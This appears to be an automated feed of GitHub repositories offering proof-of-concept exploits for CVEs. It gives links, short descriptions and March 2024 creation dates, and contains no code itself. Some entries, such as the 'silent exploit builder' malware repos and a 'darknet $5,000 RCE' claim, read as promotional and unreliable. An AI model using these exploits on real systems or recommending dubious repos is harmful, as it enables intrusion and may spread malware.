**no description** : [awjkjflkwlekfdjs/CVE-2024-29272](https://github.com/awjkjflkwlekfdjs/CVE-2024-29272) create time: 2024-03-25T22:43:42Z

**ADManager Plus Build < 7210 Elevation of Privilege Vulnerability** : [passtheticket/CVE-2024-24409](https://github.com/passtheticket/CVE-2024-24409) create time: 2024-03-25T20:51:56Z

**no description** : [alexcote1/CVE-2024-23722-poc](https://github.com/alexcote1/CVE-2024-23722-poc) create time: 2024-03-25T17:50:33Z

**no description** : [mukeshkumar286/spring-security-CVE-2022-22978-Jar](https://github.com/mukeshkumar286/spring-security-CVE-2022-22978-Jar) create time: 2024-03-25T14:30:20Z

**evil-winrar,CVE-2023-38831漏洞利用和社会工程学攻击框架 (evil-winrar, CVE-2023-38831 Vulnerability Exploitation and Social Engineering Attack Framework)** : [youmulijiang/evil-winrar](https://github.com/youmulijiang/evil-winrar) create time: 2024-03-25T14:05:24Z

**Tenda AC10 Router exploit stack-based buffer overflow** : [Schnaidr/CVE-2024-2856-Stack-overflow-EXP](https://github.com/Schnaidr/CVE-2024-2856-Stack-overflow-EXP) create time: 2024-03-25T14:34:26Z

**Additional resources for leaking and exploiting ObjRefs via HTTP .NET Remoting (CVE-2024-29059)** : [codewhitesec/HttpRemotingObjRefLeak](https://github.com/codewhitesec/HttpRemotingObjRefLeak) create time: 2024-03-11T10:14:39Z

**TENDA ROUTER AC10 - RCE (full research)** : [mansploit/CVE-2024-29197-exploit](https://github.com/mansploit/CVE-2024-29197-exploit) create time: 2024-03-25T09:47:01Z

**exploit for OneUptime - grab the master_key, escalate to admin** : [mansploit/CVE-2024-29194-POC](https://github.com/mansploit/CVE-2024-29194-POC) create time: 2024-03-25T09:29:37Z

**CVE-2023-47882** : [actuator/yi](https://github.com/actuator/yi) create time: 2023-11-05T20:37:24Z

**Proof of Concept script to exploit the authenticated SSTI+RCE in Grav CMS (CVE-2024-28116)** : [akabe1/Graver](https://github.com/akabe1/Graver) create time: 2024-03-24T13:14:52Z

**Part of my cybersecurity thesis consists in exploring and exploiting this vulnerability.** : [Kyyomaa/CVE-2021-3560-EXPLOIT](https://github.com/Kyyomaa/CVE-2021-3560-EXPLOIT) create time: 2024-03-24T11:37:18Z

**no description** : [mukeshkumar286/spring-security-CVE-2022-22978](https://github.com/mukeshkumar286/spring-security-CVE-2022-22978) create time: 2024-03-24T09:42:40Z

**no description** : [ox1111/CVE-2022-32898](https://github.com/ox1111/CVE-2022-32898) create time: 2024-03-24T09:26:29Z

**CVE-2023-41724 POC RCE Ivanti** : [russhackerr/CVE-2023-41724](https://github.com/russhackerr/CVE-2023-41724) create time: 2024-03-24T07:25:46Z

**This Python script automates the process of scanning for systems potentially vulnerable to the Loop DoS attack and the hypothetical CVE-2024-2169 vulnerability. It focuses on scanning ports associated with protocols susceptible to denial-of-service (DoS) attacks. The script can be used for educational purposes or authorized penetration testing.** : [douglasbuzatto/G3-Loop-DoS](https://github.com/douglasbuzatto/G3-Loop-DoS) create time: 2024-03-24T07:53:52Z

**no description** : [CharonDefalt/WordPress--CVE-2022-21661](https://github.com/CharonDefalt/WordPress--CVE-2022-21661) create time: 2024-03-24T07:03:35Z

**no description** : [0xyassine/CVE-2023-40028](https://github.com/0xyassine/CVE-2023-40028) create time: 2024-03-23T15:25:49Z

**Explore CVE-2023-33580 (XSS) & CVE-2023-33584 (SQLI) discovered by me. Dive into vulnerabilities and exploits for insights.** : [sudovivek/My-CVE](https://github.com/sudovivek/My-CVE) create time: 2023-06-04T11:27:20Z

**exploit CVE-2021-44228** : [sec13b/CVE-2021-44228-POC](https://github.com/sec13b/CVE-2021-44228-POC) create time: 2024-03-23T05:03:44Z

**Fixes broken syntax in the POC, automates the API_Token retrieval, stores the token as a variable and pipes into the fixed POC.** : [bucketcat/CVE-2023-48084](https://github.com/bucketcat/CVE-2023-48084) create time: 2024-03-23T00:31:37Z

**A improper neutralization of special elements used in an sql command ('sql injection') in Fortinet FortiClientEMS version 7.2.0 through 7.2.2, FortiClientEMS 7.0.1 through 7.0.10 allows attacker to execute unauthorized code or commands via specially crafted packets.** : [TheRedDevil1/CVE-2023-48788-exploit](https://github.com/TheRedDevil1/CVE-2023-48788-exploit) create time: 2024-03-22T22:53:50Z

**no description** : [sxyrxyy/CVE-2024-1709-ConnectWise-ScreenConnect-Authentication-Bypass](https://github.com/sxyrxyy/CVE-2024-1709-ConnectWise-ScreenConnect-Authentication-Bypass) create time: 2024-03-22T21:20:19Z

**CVE-2023-48788 PoC SQLi----> RCE** : [CVETechnologic/CVE-2023-48788-Proof-of-concept-SQLinj](https://github.com/CVETechnologic/CVE-2023-48788-Proof-of-concept-SQLinj) create time: 2024-03-22T19:06:35Z

**no description** : [XenoM0rph97/cve-2024-xxxxx](https://github.com/XenoM0rph97/cve-2024-xxxxx) create time: 2024-03-22T16:50:40Z

**CVE Json Files - 2010, 2012, 2018, 2021 and 2022** : [NaInSec/CVE-1012182122-JSON](https://github.com/NaInSec/CVE-1012182122-JSON) create time: 2024-03-22T14:36:24Z

**no description** : [jet-pentest/CVE-2024-25175](https://github.com/jet-pentest/CVE-2024-25175) create time: 2024-03-22T11:54:36Z

**no description** : [Soteria-Research/cve-2015-4843-type-confusion-phrack](https://github.com/Soteria-Research/cve-2015-4843-type-confusion-phrack) create time: 2023-11-24T14:09:30Z

**CVE-2022-23093 FreeBSD Stack-Based Overflow** : [Symbolexe/DrayTek-Exploit](https://github.com/Symbolexe/DrayTek-Exploit) create time: 2024-03-22T08:38:40Z

**CVE-2022-23093 FreeBSD Stack-Based Overflow** : [Symbolexe/DrayTek-Exploit](https://github.com/Symbolexe/DrayTek-Exploit) create time: 2024-03-22T08:20:56Z

**no description** : [Nhom6KTLT/CVE-2010-3124](https://github.com/Nhom6KTLT/CVE-2010-3124) create time: 2024-03-22T05:55:12Z

**to be released** : [Marven11/CVE-2024-28397](https://github.com/Marven11/CVE-2024-28397) create time: 2024-03-22T04:29:34Z

**Windows Kernel Pool (clfs.sys) Corruption Privilege Escalation** : [Nassim-Asrir/CVE-2023-36424](https://github.com/Nassim-Asrir/CVE-2023-36424) create time: 2024-03-21T21:39:24Z

**according to trendmicro's research** : [wr00t/CVE-2024-21412_Water-Hydra](https://github.com/wr00t/CVE-2024-21412_Water-Hydra) create time: 2024-03-21T15:57:51Z

**Arbitrary File Upload Vulnerability in ROS2 Humble Hawksbill** : [yashpatelphd/CVE-2024-29455](https://github.com/yashpatelphd/CVE-2024-29455) create time: 2024-03-21T14:54:01Z

**Remote Command Execution Vulnerability in ROS2 Humble Hawksbill** : [yashpatelphd/CVE-2024-29454](https://github.com/yashpatelphd/CVE-2024-29454) create time: 2024-03-21T14:49:26Z

**Insecure Deserialization Vulnerability in ROS2 Humble Hawksbill** : [yashpatelphd/CVE-2024-29452](https://github.com/yashpatelphd/CVE-2024-29452) create time: 2024-03-21T14:44:28Z

**Privilege Escalation in ROS2 Humble Hawksbill** : [yashpatelphd/CVE-2024-29450](https://github.com/yashpatelphd/CVE-2024-29450) create time: 2024-03-21T14:37:07Z

**Cleartext Transmission Vulnerability in ROS2 Humble Hawksbill** : [yashpatelphd/CVE-2024-29449](https://github.com/yashpatelphd/CVE-2024-29449) create time: 2024-03-21T14:32:10Z

**Buffer Overflow Vulnerability in ROS2 Humble Hawksbill** : [yashpatelphd/CVE-2024-29448](https://github.com/yashpatelphd/CVE-2024-29448) create time: 2024-03-21T14:25:35Z

**Security Misconfiguration in ROS2 Humble Hawksbill** : [yashpatelphd/CVE-2024-29447](https://github.com/yashpatelphd/CVE-2024-29447) create time: 2024-03-21T14:22:28Z

**Information Leakage in ROS2 Humble Hawksbill via Plaintext Message Transmission** : [yashpatelphd/CVE-2024-29445](https://github.com/yashpatelphd/CVE-2024-29445) create time: 2024-03-21T14:17:57Z

**no description** : [yashpatelphd/CVE-2024-29444](https://github.com/yashpatelphd/CVE-2024-29444) create time: 2024-03-21T14:14:51Z

**Shell Injection Vulnerability in ROS2 Humble Hawksbill** : [yashpatelphd/CVE-2024-29443](https://github.com/yashpatelphd/CVE-2024-29443) create time: 2024-03-21T14:05:43Z

**Unauthorized Information Access Vulnerability in ROS2 Humble Hawksbill** : [yashpatelphd/CVE-2024-29442](https://github.com/yashpatelphd/CVE-2024-29442) create time: 2024-03-21T13:52:18Z

**Unauthorized Access Vulnerability in ROS2 Humble Hawksbill** : [yashpatelphd/CVE-2024-29440](https://github.com/yashpatelphd/CVE-2024-29440) create time: 2024-03-21T13:48:01Z

**Unauthorized Node Injection Vulnerability in ROS2 Humble Hawksbill** : [yashpatelphd/CVE-2024-29439](https://github.com/yashpatelphd/CVE-2024-29439) create time: 2024-03-21T13:43:22Z

**Denial-of-Service (DoS) Vulnerability in ROS2 Humble Hawksbill** : [yashpatelphd/CVE-2024-29441](https://github.com/yashpatelphd/CVE-2024-29441) create time: 2024-03-21T13:31:50Z

**Practice POC scripting in Tryhackme’s intro poc scripting room** : [CpyRe/CVE-2012-2982](https://github.com/CpyRe/CVE-2012-2982) create time: 2024-03-21T13:08:33Z

**Fortinet FortiClient EMS SQL Injection** : [horizon3ai/CVE-2023-48788](https://github.com/horizon3ai/CVE-2023-48788) create time: 2024-03-18T20:50:48Z

**CVE-2023-30943 (Moodle XSS)** : [RubyCat1337/CVE-2023-30943](https://github.com/RubyCat1337/CVE-2023-30943) create time: 2024-03-21T08:08:52Z

**no description** : [Lilly-dox/Exploit-CVE-2023-22518](https://github.com/Lilly-dox/Exploit-CVE-2023-22518) create time: 2024-03-21T07:55:00Z

**no description** : [JolynNgSC/Zerologon_CVE-2020-1472](https://github.com/JolynNgSC/Zerologon_CVE-2020-1472) create time: 2024-03-21T05:52:40Z

**no description** : [JolynNgSC/EFS_CVE-2021-43217](https://github.com/JolynNgSC/EFS_CVE-2021-43217) create time: 2024-03-21T05:12:25Z

**no description** : [Vulnpire/CVE-2022-0412](https://github.com/Vulnpire/CVE-2022-0412) create time: 2024-03-20T22:22:51Z

**proof of Concept (PoC) exploit for CVE-2021-31630, targeting the OpenPLC service running on the WifineticTwo box on the Hack The Box platform.** : [Hunt3r0x/CVE-2021-31630-HTB](https://github.com/Hunt3r0x/CVE-2021-31630-HTB) create time: 2024-03-20T22:02:53Z

**Proof-of-concept exploit for CVE-2024-1086, working on most Linux kernels between (including) v5.14 and (including) v6.6, including (but not limited to) Debian, Ubuntu, and KernelCTF.** : [Notselwyn/CVE-2024-1086](https://github.com/Notselwyn/CVE-2024-1086) create time: 2024-03-20T21:16:41Z

**Exploit I discovered in October of 2022 with androids Package manager binary (pm) and the way it handled debugging flags, patched out by march 2023. Uses CVE-2019-16253 as a payload to obtain a system shell.** : [k0mraid3/K0mraid3s-System-Shell-PREBUILT](https://github.com/k0mraid3/K0mraid3s-System-Shell-PREBUILT) create time: 2023-01-19T19:47:13Z

**no description** : [Satheesh575555/openSSL_1.0.1g_CVE-2014-3507](https://github.com/Satheesh575555/openSSL_1.0.1g_CVE-2014-3507) create time: 2024-03-20T10:50:34Z

**no description** : [hshivhare67/Jetty_v9.4.31_CVE-2021-34428](https://github.com/hshivhare67/Jetty_v9.4.31_CVE-2021-34428) create time: 2023-11-27T07:25:34Z

**no description** : [Satheesh575555/openSSL_1.0.1g_CVE-2014-3507](https://github.com/Satheesh575555/openSSL_1.0.1g_CVE-2014-3507) create time: 2024-03-20T10:15:02Z

**Proof of Work of CVE-2023-23397 for vulnerable Microsoft Outlook client application.** : [TheUnknownSoul/CVE-2023-23397-PoW](https://github.com/TheUnknownSoul/CVE-2023-23397-PoW) create time: 2024-03-20T09:49:01Z

**no description** : [Trinadh465/external_aac_android-4.2.2_r1_CVE-2023-21282](https://github.com/Trinadh465/external_aac_android-4.2.2_r1_CVE-2023-21282) create time: 2024-03-20T07:15:49Z

**no description** : [Nkipohcs/CVE-2023-2640-CVE-2023-32629](https://github.com/Nkipohcs/CVE-2023-2640-CVE-2023-32629) create time: 2024-03-19T22:56:24Z

**Unauthenticated Command Injection In Progress Kemp LoadMaster** : [Chocapikk/CVE-2024-1212](https://github.com/Chocapikk/CVE-2024-1212) create time: 2024-03-19T22:23:18Z

**aiohttp LFI (CVE-2024-23334)** : [jhonnybonny/CVE-2024-23334](https://github.com/jhonnybonny/CVE-2024-23334) create time: 2024-03-19T16:28:56Z

**CVE-2022-46395 POC for FireTV 2nd gen Cube (raven)** : [Pro-me3us/CVE_2022_46395_Raven](https://github.com/Pro-me3us/CVE_2022_46395_Raven) create time: 2023-06-29T18:56:04Z

**Mass Exploit CVE-2024-1698 - Wordpress NotificationX <= 2.8.2 - SQL Injection** : [codeb0ss/CVE-2024-1698-PoC](https://github.com/codeb0ss/CVE-2024-1698-PoC) create time: 2024-03-19T14:22:45Z

**no description** : [Yang-Shun-Yu/CVE-2023-38545](https://github.com/Yang-Shun-Yu/CVE-2023-38545) create time: 2024-03-19T13:45:09Z

**a demo poc for CVE-2024-0015** : [UmVfX1BvaW50/CVE-2024-0015](https://github.com/UmVfX1BvaW50/CVE-2024-0015) create time: 2024-03-19T10:00:21Z

**Researching CVE published originally by longterm.io** : [sparrow-labz/CVE-2020-0423](https://github.com/sparrow-labz/CVE-2020-0423) create time: 2024-03-19T01:47:28Z

**A vuln about csapp.** : [heshi906/CVE-2024-28515](https://github.com/heshi906/CVE-2024-28515) create time: 2024-03-19T01:53:48Z

**A proof of concept of the path traversal vulnerability in the python AioHTTP library =< 3.9.1** : [z3rObyte/CVE-2024-23334-PoC](https://github.com/z3rObyte/CVE-2024-23334-PoC) create time: 2024-03-18T20:39:27Z

**no description** : [K3ysTr0K3R/CVE-2017-12617-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2017-12617-EXPLOIT) create time: 2024-03-18T20:10:46Z

**no description** : [jftierno/CVE-2018-6574](https://github.com/jftierno/CVE-2018-6574) create time: 2022-05-27T14:34:28Z

**no description** : [jftierno/-CVE-2018-6574](https://github.com/jftierno/-CVE-2018-6574) create time: 2024-03-18T17:34:23Z

**no description** : [Matrexdz/CVE-2024-1071-Docker](https://github.com/Matrexdz/CVE-2024-1071-Docker) create time: 2024-03-18T17:07:27Z

**CVE-2024-1071** : [Matrexdz/CVE-2024-1071](https://github.com/Matrexdz/CVE-2024-1071) create time: 2024-03-18T16:58:46Z

**no description** : [K3ysTr0K3R/CVE-2017-12615-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2017-12615-EXPLOIT) create time: 2024-03-18T16:12:13Z

**This lab was set up to test CVE-2023-33733** : [onion2203/Lab_Reportlab](https://github.com/onion2203/Lab_Reportlab) create time: 2024-03-18T09:54:02Z

**no description** : [0xWhoami35/CloudPanel-CVE-2023-33747](https://github.com/0xWhoami35/CloudPanel-CVE-2023-33747) create time: 2024-03-18T13:56:17Z

**no description** : [hshivhare67/OpenSSL_1.0.1g_CVE-2022-0778](https://github.com/hshivhare67/OpenSSL_1.0.1g_CVE-2022-0778) create time: 2024-03-18T12:00:39Z

**no description** : [hshivhare67/OpenSSL_1.0.1g_CVE-2014-3470](https://github.com/hshivhare67/OpenSSL_1.0.1g_CVE-2014-3470) create time: 2023-09-04T06:44:34Z

**Vulnerability in PHP Phar files, due to buffer overflow, arises from insufficient length checks on file names within the Phar archive. Malicious actors can craft Phar files with long file names, leading to buffer overflow and potential execution of malicious code or data leakage. This vulnerability can be exploited for code execution CVE-2023-3824** : [jhonnybonny/CVE-2023-3824](https://github.com/jhonnybonny/CVE-2023-3824) create time: 2024-03-18T10:45:33Z

**Proof-of-concept exploit for CVE-2024-25153.** : [rainbowhatrkn/CVE-2024-25153](https://github.com/rainbowhatrkn/CVE-2024-25153) create time: 2024-03-18T09:02:56Z

**CVE-2023-48788 is a SQLi vulnerability which leads to unauthenticated remote code executing in fortinet's FortiClientEMS.** : [TheRedDevil1/CVE-2023-48788](https://github.com/TheRedDevil1/CVE-2023-48788) create time: 2024-03-18T04:25:48Z

**no description** : [TheRedDevil1/CVE-2024-23897](https://github.com/TheRedDevil1/CVE-2024-23897) create time: 2024-03-18T04:11:14Z

**no description** : [Sk3pper/CVE-2024-21626](https://github.com/Sk3pper/CVE-2024-21626) create time: 2024-03-15T10:38:27Z

**Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability** : [rxerium/CVE-2022-41352](https://github.com/rxerium/CVE-2022-41352) create time: 2024-03-17T19:59:58Z

**An attacker could place HTML containing executable JavaScript inside element attributes. This markup becomes unescaped, causing arbitrary markup to be injected into the document.** : [rxerium/CVE-2022-24086](https://github.com/rxerium/CVE-2022-24086) create time: 2024-03-17T19:29:37Z

**exploit of the Shellshock vulnerability** : [sagisar1/CVE-2014-6721-exploit-Shellshock](https://github.com/sagisar1/CVE-2014-6721-exploit-Shellshock) create time: 2024-03-17T13:08:39Z

**no description** : [0xWhoami35/CloudPanel-CVE-2023-33747](https://github.com/0xWhoami35/CloudPanel-CVE-2023-33747) create time: 2024-03-17T13:12:57Z

**no description** : [sxyrxyy/aiohttp-exploit-CVE-2024-23334-certstream](https://github.com/sxyrxyy/aiohttp-exploit-CVE-2024-23334-certstream) create time: 2024-03-17T10:56:02Z

**The PoC demonstrates the potential for remote code execution by exploiting the identified security flaw.** : [d0rb/CVE-2024-21762](https://github.com/d0rb/CVE-2024-21762) create time: 2024-03-17T09:15:22Z

**no description** : [jakabakos/CVE-2023-37679-mirth-connect-rce-poc](https://github.com/jakabakos/CVE-2023-37679-mirth-connect-rce-poc) create time: 2024-03-17T08:44:14Z

**Arbitrary code execution vulnerability** : [xF-9979/CVE-2024-24520](https://github.com/xF-9979/CVE-2024-24520) create time: 2024-02-18T03:13:53Z

**no description** : [linuixtux/Cve2021-41379](https://github.com/linuixtux/Cve2021-41379) create time: 2024-03-17T04:50:47Z

**Simple POC for MiniShare <= 1.4.1 - Buffer Overflow** : [lautarolopez4/CVE-2004-2271](https://github.com/lautarolopez4/CVE-2004-2271) create time: 2024-03-17T02:39:02Z

**no description** : [TheRedDevil1/CVE-2024-21762](https://github.com/TheRedDevil1/CVE-2024-21762) create time: 2024-03-17T00:04:20Z

**PoC for CVE-2023-4911** : [xem6/CVE-2023-4911](https://github.com/xem6/CVE-2023-4911) create time: 2024-03-16T22:49:06Z

**Exploit for CVE-2022-4262** : [xem6/CVE-2022-4262](https://github.com/xem6/CVE-2022-4262) create time: 2024-03-16T22:10:42Z

**no description** : [lainwastaken/CVE-2022-4262](https://github.com/lainwastaken/CVE-2022-4262) create time: 2024-03-16T20:41:34Z

**Windows Hyper-V Remote Code Execution Vulnerability (RCE) CVE-2024-21407 POC** : [swagcrafte/CVE-2024-21407-POC](https://github.com/swagcrafte/CVE-2024-21407-POC) create time: 2024-03-16T19:00:26Z

**no description** : [BugBountyHunterCVE/CVE-2023-40279](https://github.com/BugBountyHunterCVE/CVE-2023-40279) create time: 2024-03-16T06:30:03Z

**no description** : [BugBountyHunterCVE/CVE-2023-40280](https://github.com/BugBountyHunterCVE/CVE-2023-40280) create time: 2024-03-16T06:25:42Z

**no description** : [BugBountyHunterCVE/CVE-2023-40275](https://github.com/BugBountyHunterCVE/CVE-2023-40275) create time: 2024-03-16T06:20:30Z

**no description** : [BugBountyHunterCVE/CVE-2023-40278](https://github.com/BugBountyHunterCVE/CVE-2023-40278) create time: 2024-03-16T06:12:56Z

**no description** : [BugBountyHunterCVE/CVE-2023-40276](https://github.com/BugBountyHunterCVE/CVE-2023-40276) create time: 2024-03-16T06:06:12Z

**no description** : [BugBountyHunterCVE/CVE-2023-40277](https://github.com/BugBountyHunterCVE/CVE-2023-40277) create time: 2024-03-16T03:52:54Z

**Based on the x.pl exploit/loader script for CVE-2009-1151** : [ItaIia/PhpMyAdmin](https://github.com/ItaIia/PhpMyAdmin) create time: 2023-06-24T21:14:10Z

**Fortinet CVE 2024** : [vorotilovaawex/CVE-2024-21762_POC](https://github.com/vorotilovaawex/CVE-2024-21762_POC) create time: 2024-03-15T23:27:32Z

**exploit for f5-big-ip RCE cve-2023-46747** : [rainbowhatrkn/CVE-2023-46747-RCE](https://github.com/rainbowhatrkn/CVE-2023-46747-RCE) create time: 2024-03-15T22:45:31Z

**This is a potentially vulnerable Java web application containing Log4j affected by log4shell(CVE-2021-44228).** : [KtokKawu/l4s-vulnapp](https://github.com/KtokKawu/l4s-vulnapp) create time: 2024-03-15T18:57:11Z

**Exploit for Open eClass – CVE-2024-26503: Unrestricted File Upload Leads to Remote Code Execution** : [RoboGR00t/Exploit-CVE-2024-26503](https://github.com/RoboGR00t/Exploit-CVE-2024-26503) create time: 2024-03-15T13:01:43Z

**no description** : [K3ysTr0K3R/CVE-2023-43208-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2023-43208-EXPLOIT) create time: 2024-03-15T12:03:51Z

**exploit for CVE-2024-21426 Microsoft SharePoint Server RCE (2024)** : [CVE-searcher/CVE-2024-21426-SharePoint-RCE](https://github.com/CVE-searcher/CVE-2024-21426-SharePoint-RCE) create time: 2024-03-15T10:24:55Z

**Research CVE-2023-33733** : [onion2203/CVE-2023-33733](https://github.com/onion2203/CVE-2023-33733) create time: 2024-03-15T05:35:40Z

**CVE-2023-48788 is a SQLi vulnerability which leads to unauthenticated remote code executing in fortinet's FortiClientEMS.** : [k4rd3n/CVE-2023-48788-PoC](https://github.com/k4rd3n/CVE-2023-48788-PoC) create time: 2024-03-15T02:14:41Z

**no description** : [mhtsec/cve-2024-12883](https://github.com/mhtsec/cve-2024-12883) create time: 2024-03-14T21:40:40Z

**no description** : [Hagrid29/CVE-2024-2432-PaloAlto-GlobalProtect-EoP](https://github.com/Hagrid29/CVE-2024-2432-PaloAlto-GlobalProtect-EoP) create time: 2024-03-14T17:48:49Z

**CVE-2024-25228 POC RCE Unpatched Command Injection in Vinchin Backup & Recovery Versions** : [rkraper339/CVE-2024-25228-POC](https://github.com/rkraper339/CVE-2024-25228-POC) create time: 2024-03-14T14:51:41Z

**no description** : [manrop2702/CVE-2020-7961](https://github.com/manrop2702/CVE-2020-7961) create time: 2024-03-14T07:29:50Z

**no description** : [levpachmanov/cve-2024-28088-poc](https://github.com/levpachmanov/cve-2024-28088-poc) create time: 2024-03-14T07:02:11Z

**no description** : [hanch7274/CVE-2023-33246](https://github.com/hanch7274/CVE-2023-33246) create time: 2024-03-14T04:29:15Z

**A CLI tool for detecting CVE-2023-20048 vulnerability in Cisco Firepower Management Center.** : [0zer0d4y/FuegoTest](https://github.com/0zer0d4y/FuegoTest) create time: 2024-03-14T01:32:41Z

**Chequea si tu firewall es vulnerable a CVE-2024-21762 (RCE sin autenticación)** : [r4p3c4/CVE-2024-21762-Exploit-PoC-Fortinet-SSL-VPN-Check](https://github.com/r4p3c4/CVE-2024-21762-Exploit-PoC-Fortinet-SSL-VPN-Check) create time: 2024-03-13T22:57:00Z

**no description** : [corelight/CVE-2021-38647-noimages](https://github.com/corelight/CVE-2021-38647-noimages) create time: 2024-03-13T20:05:11Z

**no description** : [thetrueartist/ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227](https://github.com/thetrueartist/ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227) create time: 2024-03-13T17:58:41Z

**no description** : [thetrueartist/ABO.CMS-Login-SQLi-CVE-2024-25227](https://github.com/thetrueartist/ABO.CMS-Login-SQLi-CVE-2024-25227) create time: 2024-02-23T16:46:54Z

**aaa** : [tmcve/CVE-2024-TEST](https://github.com/tmcve/CVE-2024-TEST) create time: 2024-03-13T16:16:53Z

**In the hushed galleries of the Silent JPG Exploit, a symphony shrouded in enigma unfurls—an opus named silent-jpg-exploit-2018—a title that reverberates through the annals of intrigue.** : [Makaroshi/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Makaroshi/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-03-13T14:51:15Z

**A meticulous scrutiny of the Exploit PDFs innards exposes a network of malevolence, unveiling both the nefarious hyperlink and the URL that precipitates** : [Makaroshi/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Makaroshi/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-03-13T14:51:15Z

**URL Contamination Exploit Muted Java Drive-By downloads can transpire during the act of perusing a website, inaugurating an electronic mail communication.** : [Makaroshi/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Makaroshi/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-03-13T14:51:15Z

**Microsoft Windows HTA (HTML Application) - Pinnacle of Remote Code Execution** : [Makaroshi/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Makaroshi/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-03-13T14:51:15Z

**CVE-2024-21334 POC Open Management Infrastructure (OMI) Remote Code Execution (RCE) Vulnerability** : [bigbozzez/CVE-2024-21334-POC](https://github.com/bigbozzez/CVE-2024-21334-POC) create time: 2024-03-13T14:33:40Z

**Proof-of-concept exploit for CVE-2024-25153.** : [nettitude/CVE-2024-25153](https://github.com/nettitude/CVE-2024-25153) create time: 2024-03-12T17:26:10Z

**New exploit for Fortinet's [CVE-2023-48788] to SQL injection in HTTP reqs.** : [CVETechnologic/CVE-2023-48788-Proof-of-concept-SQLinj](https://github.com/CVETechnologic/CVE-2023-48788-Proof-of-concept-SQLinj) create time: 2024-03-13T13:24:46Z

**CVE-2024-21411 POC Skype for Consumer Remote Code Execution Vulnerability (RCE)** : [rkraper339/CVE-2024-21411-POC](https://github.com/rkraper339/CVE-2024-21411-POC) create time: 2024-03-13T14:07:47Z

**CVE-2024-21400 is a privilege escalation vulnerability that rates a CVSS score of 9.0.** : [MegaCorp001/CVE-2024-21400-POC](https://github.com/MegaCorp001/CVE-2024-21400-POC) create time: 2024-03-13T14:01:26Z

**exploit for CVE-2024-26198 Microsoft Exchange Remote Code Execution (RCE)** : [MrCyberSec/CVE-2024-26198-Exchange-RCE](https://github.com/MrCyberSec/CVE-2024-26198-Exchange-RCE) create time: 2024-03-13T12:55:35Z

**out-of-bounds write in Fortinet FortiOS CVE-2024-21762 vulnerability** : [h4x0r-dz/CVE-2024-21762](https://github.com/h4x0r-dz/CVE-2024-21762) create time: 2024-03-13T09:17:28Z

**special thanks to E1A for the POC of the CVE Exploit found here: https://github.com/E1A/CVE-2023-4596** : [AlabamicHero/caldera_sandcat-usecase](https://github.com/AlabamicHero/caldera_sandcat-usecase) create time: 2024-03-13T06:23:09Z

**no description** : [Lq0ne/CVE-2024-28715](https://github.com/Lq0ne/CVE-2024-28715) create time: 2024-03-13T01:59:57Z

**Exploit new CVE-2023-42789 Fortinet FortiOS FortiProxy ----> RCE** : [CrimBit/CVE-2023-42789-POC](https://github.com/CrimBit/CVE-2023-42789-POC) create time: 2024-03-12T16:44:50Z

**CVE-2019-14678: XML External Entity in SAS XML Mapper** : [mbadanoiu/CVE-2019-14678](https://github.com/mbadanoiu/CVE-2019-14678) create time: 2024-03-12T15:49:09Z

**The only one working RCE exploit that sells for $5,000 on the darknet** : [JohnHormond/CVE-2024-21762-Fortinet-RCE-WORK](https://github.com/JohnHormond/CVE-2024-21762-Fortinet-RCE-WORK) create time: 2024-03-12T14:31:44Z

**Critical CVE-2024-21899 Vulnerability in QNAP Products** : [JohnHormond/CVE-2024-21899-RCE-exploit](https://github.com/JohnHormond/CVE-2024-21899-RCE-exploit) create time: 2024-03-12T14:20:39Z

**PoC Exploit for Outlook Vulnerability, CVE-2024-21378** : [JohnHormond/CVE-2024-21378](https://github.com/JohnHormond/CVE-2024-21378) create time: 2024-03-12T14:19:45Z

**This repository contains an exploit for targeting Microsoft Outlook through Exchange Online, leveraging a vulnerability to execute arbitrary code via COM DLLs. The exploit utilizes a modified version of Ruler to send a malicious form as an email, triggering the execution upon user interaction within the Outlook thick client.** : [d0rb/CVE-2024-21378](https://github.com/d0rb/CVE-2024-21378) create time: 2024-03-12T14:11:58Z

**no description** : [clearbluejar/CVE-2024-20696](https://github.com/clearbluejar/CVE-2024-20696) create time: 2024-03-08T02:31:41Z

**CVE-2023-23752 Data Extractor** : [JohnDoeAnonITA/CVE-2023-23752](https://github.com/JohnDoeAnonITA/CVE-2023-23752) create time: 2024-03-12T10:59:10Z

**no description** : [kitodd/CVE-2024-0713](https://github.com/kitodd/CVE-2024-0713) create time: 2024-03-12T08:32:26Z

**no description** : [hienkiet/CVE-2022-201145-12.2.1.3.0-Weblogic](https://github.com/hienkiet/CVE-2022-201145-12.2.1.3.0-Weblogic) create time: 2024-03-12T04:47:02Z

**no description** : [chebuya/CVE-2024-28741-northstar-agent-rce-poc](https://github.com/chebuya/CVE-2024-28741-northstar-agent-rce-poc) create time: 2024-03-12T01:40:35Z

**Proof of concept CVE-2024-28222 Veritas NetBackup RCE exploit CVSS-9.8** : [c0d3b3af/CVE-2024-28222-NetBackup-RCE-exploit](https://github.com/c0d3b3af/CVE-2024-28222-NetBackup-RCE-exploit) create time: 2024-03-11T13:19:27Z

**This script performs vulnerability scanning for CVE-2024-21762, a Fortinet SSL VPN remote code execution vulnerability. It checks whether a given server is vulnerable to this CVE by sending specific requests and analyzing the responses.** : [cleverg0d/CVE-2024-21762-Checker](https://github.com/cleverg0d/CVE-2024-21762-Checker) create time: 2024-03-11T12:28:05Z

**RCE exploit for FortiOS 6.0-7.4.2** : [c0d3b3af/CVE-2024-21762-RCE-exploit](https://github.com/c0d3b3af/CVE-2024-21762-RCE-exploit) create time: 2024-03-11T12:03:48Z

